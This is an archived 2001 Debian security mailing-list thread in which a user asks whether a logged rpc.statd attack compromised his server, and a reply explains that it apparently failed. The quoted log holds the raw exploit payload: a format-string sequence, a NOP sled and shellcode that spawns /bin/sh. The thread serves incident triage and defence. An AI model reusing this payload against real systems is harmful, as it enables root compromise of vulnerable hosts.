RE: was I cracked? (rpc.statd, new version)

To: "Lukas Eppler" <lukas.eppler@tempobrain.com>, <debian-security@lists.debian.org>
Subject: RE: was I cracked? (rpc.statd, new version)
From: "Jeremy Gaddis" <jlgaddis@blueriver.net>
Date: Wed, 11 Jul 2001 11:56:15 -0500
Message-id: <[🔎] NFBBJDAIMKFDLIMBEEOHEEBCCAAA.jeremy@home.lan>
In-reply-to: <[🔎] 01071111420302.00984@io>

Someone attempted to run the rpc.statd buffer overflow on
you, but it appears to have failed.  The reason you see
"/bin/sh" in the log entry is because that's part of the
shellcode of the exploit.  The exploit, when successful,
executes /bin/sh on your machine and leaves the attacker
sitting at a root shell prompt.

As someone else stated, disable the rpc.* services if you
don't need them.  If you do, they should be firewalled off
and only accept packets from machines they need to "converse"
with.

j.

--
Jeremy L. Gaddis     <jlgaddis@blueriver.net>

-----Original Message-----
From: Lukas Eppler [mailto:lukas.eppler@tempobrain.com]
Sent: Wednesday, July 11, 2001 5:42 AM
To: debian-security@lists.debian.org
Subject: was I cracked? (rpc.statd, new version)


I have the following entries in /var/log/messages:

Jul  9 01:21:03 blue -- MARK --
Jul  9 01:21:11 blue
Jul  9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for
^X<F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z
<F7><FF><BF>^[<F7><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x
%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220
Jul  9 01:21:11 blue
<C7>^F/bin<C7>F^D/shA0<C0>\210F^G\211v^L\215V^P\215N^L\211<F3><B0>^K<CD>
\200<B0>^A<CD>\200<E8>\177<FF><FF><FF>
Jul  9 01:41:03 blue -- MARK --

I run debian 2.2, nfs-common is Version: 1:0.1.9.1-1 which has the long
known
exploit fixed. I can't find modified binaries or any strange
behaviour... was
this a defeated attack? The second line says /bin/sh somewhere which
makes me
a bit concerned... Was I cracked?

Lukas



--
Tempobrain AG - Dufourstrasse 179 - 8008 Zürich
http://www.tempobrain.com | icq # 5856 2285
+44 20 7233 6206 | +44 79 8037 7312
+41  1 389 29 29 | +41 76 373 07 87


--
To UNSUBSCRIBE, email to debian-security-request@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact
listmaster@lists.debian.org

Reply to:

Follow-Ups:
- Re: was I cracked? (rpc.statd, new version)
  - From: Jeff Coppock <jcoppock1@home.com>

References:
- was I cracked? (rpc.statd, new version)
  - From: Lukas Eppler <lukas.eppler@tempobrain.com>

Prev by Date: Re: was I cracked? (rpc.statd, new version)
Next by Date: Help needed on snort
Previous by thread: Re: was I cracked? (rpc.statd, new version)
Next by thread: Re: was I cracked? (rpc.statd, new version)
Index(es):
- Date
- Thread